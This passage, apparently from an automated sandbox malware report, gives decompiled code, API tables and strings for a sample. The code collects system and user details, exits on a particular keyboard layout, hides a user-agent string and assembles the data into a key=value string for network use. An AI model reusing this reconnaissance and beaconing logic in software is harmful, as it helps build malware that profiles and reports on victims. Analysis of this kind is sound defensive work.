									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FBB7410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0fbb7490
0x0fbb7490
0x0fbb749b
0x0fbb74a7
0x0fbb74b7
0x0fbb74b9
0x0fbb74bc
0x0fbb74c1
0x0fbb74c8
0x0fbb74c8
0x0fbb74d2
0x0fbb74df
0x0fbb74e6
0x0fbb74e8
0x0fbb74eb
0x0fbb74f0
0x0fbb74f0
0x0fbb7500
0x0fbb7556
0x0fbb755a
0x0fbb75f5
0x0fbb75f9
0x0fbb76f9
0x0fbb76fd
0x0fbb770d
0x0fbb770f
0x0fbb7725
0x0fbb7728
0x0fbb772f
0x0fbb7731
0x0fbb7749
0x0fbb7756
0x0fbb7758
0x0fbb7758
0x0fbb772f
0x0fbb775f
0x0fbb77ce
0x0fbb77d2
0x0fbb77d7
0x0fbb77e3
0x0fbb77ea
0x0fbb77ec
0x0fbb77ec
0x0fbb77ea
0x0fbb77f3
0x0fbb7807
0x0fbb7817
0x0fbb781a
0x0fbb781c
0x0fbb7824
0x0fbb782c
0x0fbb782c
0x0fbb7837
0x0fbb783b
0x0fbb7842
0x0fbb7849
0x0fbb7856
0x0fbb785e
0x0fbb7864
0x0fbb786a
0x0fbb786a
0x0fbb7880
0x0fbb7887
0x0fbb7889
0x0fbb7890
0x0fbb7896
0x0fbb7896
0x0fbb789c
0x0fbb78b5
0x0fbb78b5
0x0fbb78c8
0x0fbb78d0
0x0fbb78d6
0x0fbb78dd
0x0fbb78f0
0x0fbb78f6
0x0fbb78fb
0x0fbb7919
0x0fbb78fd
0x0fbb7914
0x0fbb7914
0x0fbb792e
0x0fbb7931
0x0fbb7931
0x0fbb7943
0x0fbb7af2
0x0fbb7af9
0x0fbb7b42
0x0fbb7b4b
0x0fbb7b4b
0x0fbb7b09
0x0fbb7b0f
0x0fbb7b17
0x0fbb7b36
0x0fbb7b36
0x00000000
0x0fbb7b36
0x0fbb7b19
0x0fbb7b1b
0x0fbb7b22
0x00000000
0x00000000
0x0fbb7b30
0x00000000
0x0fbb7949
0x0fbb7957
0x0fbb795e
0x0fbb7965
0x0fbb796c
0x0fbb7973
0x0fbb797a
0x0fbb7981
0x0fbb7988
0x0fbb798e
0x0fbb7991
0x0fbb7994
0x0fbb79a0
0x0fbb79a0
0x0fbb79a3
0x0fbb79a6
0x0fbb79a7
0x0fbb79ad
0x0fbb79b2
0x0fbb79b5
0x0fbb79ba
0x0fbb79bd
0x0fbb79bf
0x0fbb79c2
0x0fbb79c7
0x0fbb79cf
0x0fbb79d5
0x0fbb79da
0x0fbb79eb
0x0fbb79f6
0x0fbb7a04
0x0fbb7a08
0x0fbb7a12
0x0fbb7a28
0x0fbb7a30
0x0fbb7acb
0x00000000
0x0fbb7acb
0x0fbb7a52
0x0fbb7a55
0x0fbb7a57
0x0fbb7a5c
0x0fbb7a68
0x0fbb7a6b
0x0fbb7a6d
0x0fbb7a70
0x0fbb7a79
0x0fbb7a8a
0x0fbb7a98
0x0fbb7a9a
0x0fbb7aac
0x0fbb7ab4
0x0fbb7abf
0x0fbb7abf
0x0fbb7ad6
0x0fbb7ad7
0x0fbb7ada
0x0fbb7ae6
0x0fbb7ae8
0x0fbb7aed
0x00000000
0x0fbb7aed
0x0fbb7761
0x0fbb7765
0x0fbb7776
0x0fbb7778
0x0fbb777c
0x0fbb7782
0x0fbb77c3
0x0fbb77c3
0x0fbb77c8
0x0fbb77c9
0x0fbb77cb
0x00000000
0x0fbb77cb
0x0fbb7784
0x0fbb778b
0x00000000
0x0fbb77bc
0x00000000
0x00000000
0x0fbb77ae
0x00000000
0x00000000
0x0fbb77b5
0x00000000
0x00000000
0x0fbb77a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb778b
0x0fbb775f
0x0fbb760d
0x0fbb7616
0x0fbb7620
0x0fbb7623
0x0fbb7625
0x0fbb7628
0x0fbb762d
0x0fbb7634
0x0fbb763d
0x0fbb763f
0x0fbb7642
0x0fbb764c
0x0fbb765f
0x0fbb7667
0x0fbb76c4
0x0fbb76c4
0x0fbb76c6
0x00000000
0x0fbb76c6
0x0fbb766c
0x0fbb7681
0x0fbb7689
0x0fbb7694
0x0fbb768b
0x0fbb768b
0x0fbb768b
0x0fbb769d
0x0fbb76a7
0x00000000
0x0fbb76a9
0x0fbb76b9
0x0fbb779a
0x0fbb779c
0x0fbb77a1
0x0fbb77a1
0x0fbb76bf
0x0fbb76bf
0x0fbb76c9
0x0fbb76c9
0x0fbb76de
0x0fbb76e0
0x0fbb76ed
0x00000000
0x0fbb76f3
0x0fbb756e
0x0fbb7570
0x0fbb7573
0x0fbb758b
0x0fbb7592
0x0fbb759a
0x0fbb75de
0x0fbb75e8
0x0fbb75ef
0x00000000
0x0fbb75ef
0x0fbb759f
0x0fbb75b6
0x0fbb75be
0x0fbb75c9
0x0fbb75c0
0x0fbb75c0
0x0fbb75c0
0x0fbb75d2
0x0fbb75dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb7502
0x0fbb7510
0x0fbb7512
0x0fbb7517
0x00000000
0x00000000
0x0fbb7519
0x0fbb752f
0x0fbb7536
0x0fbb7551
0x0fbb7551
0x0fbb7553
0x00000000
0x0fbb7553
0x0fbb7538
0x0fbb753f
0x00000000
0x00000000
0x0fbb7551
0x00000000
0x0fbb7551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBB74B7
GetUserNameW.ADVAPI32 ref: 0FBB74C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBB74E6
GetComputerNameW.KERNEL32 ref: 0FBB74F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB7510
wsprintfW.USER32 ref: 0FBB7551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
GetLastError.KERNEL32 ref: 0FBB75C9
RegCloseKey.KERNEL32(00000000), ref: 0FBB75D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBB75EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FBB760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBB7623
wsprintfW.USER32 ref: 0FBB763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FBB765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0FBB4810,?), ref: 0FBB7681
GetLastError.KERNEL32 ref: 0FBB7694
RegCloseKey.KERNEL32(?), ref: 0FBB769D
lstrcmpiW.KERNEL32(0FBB4810,00000419), ref: 0FBB76B1
wsprintfW.USER32 ref: 0FBB76DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB76ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FBB770D
wsprintfW.USER32 ref: 0FBB7756
GetNativeSystemInfo.KERNEL32(?), ref: 0FBB7765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FBB7776
wsprintfW.USER32 ref: 0FBB779A
ExitProcess.KERNEL32 ref: 0FBB77A1
wsprintfW.USER32 ref: 0FBB77C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBB7807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0FBB781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FBB7824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FBB785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBB7890
wsprintfW.USER32 ref: 0FBB78C8
lstrcatW.KERNEL32 ref: 0FBB78DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FBB78E9
GetProcAddress.KERNEL32(00000000), ref: 0FBB78F0
lstrlenW.KERNEL32(?), ref: 0FBB7900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB7931

Part of subcall function 0FBB7B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FBB7B8D
Part of subcall function 0FBB7B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBB7C01
Part of subcall function 0FBB7B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBB7C16
Part of subcall function 0FBB7B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB7C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBB7988
GetDriveTypeW.KERNEL32(?), ref: 0FBB79CF
lstrcatW.KERNEL32 ref: 0FBB79F6
lstrcatW.KERNEL32 ref: 0FBB7A08
lstrcatW.KERNEL32 ref: 0FBB7A12
GetDiskFreeSpaceW.KERNEL32(?,?,0FBB4810,?,00000000), ref: 0FBB7A28
lstrlenW.KERNEL32(?,?,00000000,0FBB4810,00000000,00000000,00000000,0FBB4810,00000000), ref: 0FBB7A70
wsprintfW.USER32 ref: 0FBB7A8A
lstrlenW.KERNEL32(?), ref: 0FBB7A98
wsprintfW.USER32 ref: 0FBB7AAC
lstrcatW.KERNEL32 ref: 0FBB7ABF
lstrcatW.KERNEL32 ref: 0FBB7ACB
lstrlenW.KERNEL32(?), ref: 0FBB7AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FBB7B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FBB7B30

Strings

?:\, xrefs: 0FBB79AD
Itanium, xrefs: 0FBB77B5
%I64u, xrefs: 0FBB7AA3
@, xrefs: 0FBB759F
00000419, xrefs: 0FBB76A9
Unknown, xrefs: 0FBB77C3
Identifier, xrefs: 0FBB78A6
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBB771B
LocaleName, xrefs: 0FBB75AE
WORKGROUP, xrefs: 0FBB7541
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FBB7876, 0FBB78AB
%I64u/, xrefs: 0FBB7A84
Control Panel\International, xrefs: 0FBB7581
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FBB7525
ProcessorNameString, xrefs: 0FBB7871
Keyboard Layout\Preload, xrefs: 0FBB7655
ntdll.dll, xrefs: 0FBB78E4
x64, xrefs: 0FBB77A7
undefined, xrefs: 0FBB7549
error, xrefs: 0FBB774E
Domain, xrefs: 0FBB7520
RtlComputeCrc32, xrefs: 0FBB78DF
ARM, xrefs: 0FBB77AE
productName, xrefs: 0FBB7716, 0FBB773A
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBB773F
x86, xrefs: 0FBB77BC

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-983031137
Opcode ID: 414636666c9e15e4698c1a2d652c3a3c5272efe64215adb74e434441d4c1ad87
Instruction ID: 376cde7a69008b2288c8eab35a37405bdc6fc85121decb84cce6463b8208e381
Opcode Fuzzy Hash: 414636666c9e15e4698c1a2d652c3a3c5272efe64215adb74e434441d4c1ad87
Instruction Fuzzy Hash: EE129F70A40305FBEB209BA5EC4AFEABBB8FB48701F20055DF641A6191DBF4A514CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB7E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0fbb7e58
0x0fbb7e64
0x0fbb7e6f
0x0fbb7e79
0x0fbb7e83
0x0fbb7e8d
0x0fbb7e97
0x0fbb7ea1
0x0fbb7eab
0x0fbb7eb5
0x0fbb7ebf
0x0fbb7ec9
0x0fbb7ed3
0x0fbb7edd
0x0fbb7ee7
0x0fbb7ef1
0x0fbb7efb
0x0fbb7f05
0x0fbb7f0f
0x0fbb7f19
0x0fbb7f23
0x0fbb7f2d
0x0fbb7f37
0x0fbb7f41
0x0fbb7f4b
0x0fbb7f52
0x0fbb7f59
0x0fbb7f60
0x0fbb7f67
0x0fbb7f6e
0x0fbb7f75
0x0fbb7f7c
0x0fbb7f83
0x0fbb7f8a
0x0fbb7f91
0x0fbb7f98
0x0fbb7f9f
0x0fbb7fa6
0x0fbb7fad
0x0fbb7fb4
0x0fbb7fbb
0x0fbb7fc2
0x0fbb7fc9
0x0fbb7fd0
0x0fbb7fd7
0x0fbb7fde
0x0fbb7fe5
0x0fbb7fec
0x0fbb7ff3
0x0fbb7ffa
0x0fbb8001
0x0fbb8008
0x0fbb800f
0x0fbb8016
0x0fbb801d
0x0fbb8024
0x0fbb8026
0x0fbb802b
0x0fbb803d
0x0fbb803f
0x00000000
0x0fbb803f
0x0fbb8048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

Strings

7, xrefs: 0FBB7F59
), xrefs: 0FBB7F0F
c, xrefs: 0FBB7F9F
K, xrefs: 0FBB7F41
M, xrefs: 0FBB7E64
, xrefs: 0FBB7EF1
6, xrefs: 0FBB7F05
8, xrefs: 0FBB7FEC
, xrefs: 0FBB7F83
5, xrefs: 0FBB800F
3, xrefs: 0FBB801D
K, xrefs: 0FBB7F6E
(, xrefs: 0FBB7EA1
o, xrefs: 0FBB7FBB
O, xrefs: 0FBB7EFB
., xrefs: 0FBB7FD7
e, xrefs: 0FBB7FC2
1, xrefs: 0FBB7EE7
8, xrefs: 0FBB7FDE
6, xrefs: 0FBB7EDD
e, xrefs: 0FBB7F2D
z, xrefs: 0FBB7E6F
, xrefs: 0FBB7F67
e, xrefs: 0FBB7F37
L, xrefs: 0FBB7F7C
a, xrefs: 0FBB8001
o, xrefs: 0FBB7FA6
t, xrefs: 0FBB7F4B
p, xrefs: 0FBB7F23
w, xrefs: 0FBB7EBF
3, xrefs: 0FBB7F60
a, xrefs: 0FBB7FFA
3, xrefs: 0FBB7FE5
., xrefs: 0FBB7FD0
i, xrefs: 0FBB8008
h, xrefs: 0FBB7FB4
A, xrefs: 0FBB7F19
, xrefs: 0FBB7FF3
0, xrefs: 0FBB7E97
i, xrefs: 0FBB7F8A
i, xrefs: 0FBB7EAB
G, xrefs: 0FBB7F98
7, xrefs: 0FBB8016
5, xrefs: 0FBB7E8D
e, xrefs: 0FBB7F91
5, xrefs: 0FBB7F52
d, xrefs: 0FBB7EB5
, xrefs: 0FBB7FAD
T, xrefs: 0FBB7ED3
T, xrefs: 0FBB7F75
5, xrefs: 0FBB7FC9
a, xrefs: 0FBB7E83
l, xrefs: 0FBB7E79
, xrefs: 0FBB7EC9

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 2a43059aaa1cdd198d0955a693a525dae4483c2b2bbd27d41a80047c9b8d1647
Instruction ID: 899e7eaa8ae25ea04683d6bb64e163c3d5ace84c1c79c152d12d4c3c8b0ef563
Opcode Fuzzy Hash: 2a43059aaa1cdd198d0955a693a525dae4483c2b2bbd27d41a80047c9b8d1647
Instruction Fuzzy Hash: 1541B7B4811358DEEB218F91999879EBFF5BB00748F50818EC5086B201C7F60A89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB70A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBB70A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0fbb70a4
0x0fbb70a7
0x0fbb70b8
0x0fbb70c1
0x0fbb70c9
0x0fbb70d2
0x0fbb70da
0x0fbb70da
0x0fbb70df
0x0fbb70e5
0x0fbb70ed
0x0fbb70f3
0x0fbb70fb
0x0fbb70fb
0x0fbb7101
0x0fbb7107
0x0fbb710f
0x0fbb7115
0x0fbb711d
0x0fbb711d
0x0fbb7123
0x0fbb7129
0x0fbb7131
0x0fbb7137
0x0fbb713f
0x0fbb713f
0x0fbb7145
0x0fbb714b
0x0fbb7153
0x0fbb7159
0x0fbb7161
0x0fbb7161
0x0fbb7167
0x0fbb716d
0x0fbb7175
0x0fbb717b
0x0fbb7183
0x0fbb7183
0x0fbb7189
0x0fbb718f
0x0fbb7197
0x0fbb719d
0x0fbb71a5
0x0fbb71a5
0x0fbb71ab
0x0fbb71b1
0x0fbb71b9
0x0fbb71bf
0x0fbb71c7
0x0fbb71c7
0x0fbb71cd
0x0fbb71d3
0x0fbb71db
0x0fbb71e1
0x0fbb71e9
0x0fbb71e9
0x0fbb71ef
0x0fbb71fc
0x0fbb7202
0x0fbb7205
0x0fbb720a
0x0fbb7227
0x0fbb720c
0x0fbb7216
0x0fbb721c
0x0fbb7234
0x0fbb723c
0x0fbb7242
0x0fbb724a
0x0fbb7256
0x0fbb7256
0x0fbb7260
0x0fbb7266
0x0fbb726e
0x0fbb7274
0x0fbb727c
0x0fbb727c
0x0fbb7288
0x0fbb7292

APIs

lstrcatW.KERNEL32 ref: 0FBB70C1
lstrcatW.KERNEL32 ref: 0FBB70C9
lstrcatW.KERNEL32 ref: 0FBB70D2
lstrcatW.KERNEL32 ref: 0FBB70DA
lstrcatW.KERNEL32 ref: 0FBB70E5
lstrcatW.KERNEL32 ref: 0FBB70ED
lstrcatW.KERNEL32 ref: 0FBB70F3
lstrcatW.KERNEL32 ref: 0FBB70FB
lstrcatW.KERNEL32 ref: 0FBB7107
lstrcatW.KERNEL32 ref: 0FBB710F
lstrcatW.KERNEL32 ref: 0FBB7115
lstrcatW.KERNEL32 ref: 0FBB711D
lstrcatW.KERNEL32 ref: 0FBB7129
lstrcatW.KERNEL32 ref: 0FBB7131
lstrcatW.KERNEL32 ref: 0FBB7137
lstrcatW.KERNEL32 ref: 0FBB713F
lstrcatW.KERNEL32 ref: 0FBB714B
lstrcatW.KERNEL32 ref: 0FBB7153
lstrcatW.KERNEL32 ref: 0FBB7159
lstrcatW.KERNEL32 ref: 0FBB7161
lstrcatW.KERNEL32 ref: 0FBB716D
lstrcatW.KERNEL32 ref: 0FBB7175
lstrcatW.KERNEL32 ref: 0FBB717B
lstrcatW.KERNEL32 ref: 0FBB7183
lstrcatW.KERNEL32 ref: 0FBB718F
lstrcatW.KERNEL32 ref: 0FBB7197
lstrcatW.KERNEL32 ref: 0FBB719D
lstrcatW.KERNEL32 ref: 0FBB71A5
lstrcatW.KERNEL32 ref: 0FBB71B1
lstrcatW.KERNEL32 ref: 0FBB71B9
lstrcatW.KERNEL32 ref: 0FBB71BF
lstrcatW.KERNEL32 ref: 0FBB71C7
lstrcatW.KERNEL32 ref: 0FBB71D3
lstrcatW.KERNEL32 ref: 0FBB71DB
lstrcatW.KERNEL32 ref: 0FBB71E1
lstrcatW.KERNEL32 ref: 0FBB71E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FBB4869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FBB71FC
wsprintfW.USER32 ref: 0FBB7216
wsprintfW.USER32 ref: 0FBB7227
lstrcatW.KERNEL32 ref: 0FBB7234
lstrcatW.KERNEL32 ref: 0FBB723C
lstrcatW.KERNEL32 ref: 0FBB7242
lstrcatW.KERNEL32 ref: 0FBB724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBB7256
